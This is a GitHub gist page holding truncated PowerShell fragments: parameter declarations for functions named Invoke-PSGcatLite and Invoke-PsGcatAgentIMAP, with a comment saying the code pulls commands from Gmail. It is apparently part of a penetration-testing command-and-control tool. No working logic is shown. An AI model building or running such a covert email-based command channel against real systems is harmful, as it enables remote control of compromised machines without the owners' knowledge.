Skip to content

Instantly share code, notes, and snippets.

View samratashok's full-sized avatar

Nikhil "SamratAshok" Mittal samratashok

View GitHub Profile
function Invoke-PSGcatLite
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $false)]
[String]
$Username,
[Parameter(Position = 1, Mandatory = $false)]
[String]
Below code tries to pull commands from Gmail.
#function Invoke-PsGcatAgentIMAP
#{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $false)]
[String]
$Username,